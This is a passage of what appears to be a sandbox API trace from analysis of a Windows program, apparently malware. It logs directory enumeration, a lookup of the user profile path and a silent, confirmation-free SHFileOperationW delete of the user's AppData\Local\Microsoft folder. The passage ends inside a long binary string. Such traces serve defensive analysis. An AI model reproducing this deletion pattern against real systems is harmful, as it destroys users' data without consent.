ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3abef650, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3abef650, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3abef650, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="TaskSchedulerConfig", cAlternateFileName="TASKSC~1")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x962f4540, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x5ef99320, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5ef99320, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Visio", cAlternateFileName="")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8d1fc80, ftLastAccessTime.dwHighDateTime=0x1d3373f, ftLastWriteTime.dwLowDateTime=0xd8d1fc80, ftLastWriteTime.dwHighDateTime=0x1d3373f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Windows", cAlternateFileName="")) returned 1 [0244.555] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c881c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c881c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0244.555] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0244.555] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0244.555] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0244.555] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0244.555] GetLastError () returned 0x12 [0244.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0244.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0244.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0244.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0244.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0244.556] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0244.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0244.556] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0244.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0244.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0244.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0244.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0244.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0244.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0244.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0244.557] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0244.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0244.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0244.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0244.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0244.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0244.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0244.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0244.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0244.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0244.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0244.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0244.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0244.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0244.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0244.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0244.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0244.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0244.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0244.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0244.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0244.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0244.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0244.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0244.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0244.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0244.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0244.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0244.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0244.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0244.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240ca38 [0244.560] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Microsoft", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft", lpFilePart=0x8bf658*="Microsoft") returned 0x35 [0244.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240ca38 | out: hHeap=0x25c0000) returned 1 [0244.560] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft")) returned 0x2010 [0244.560] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\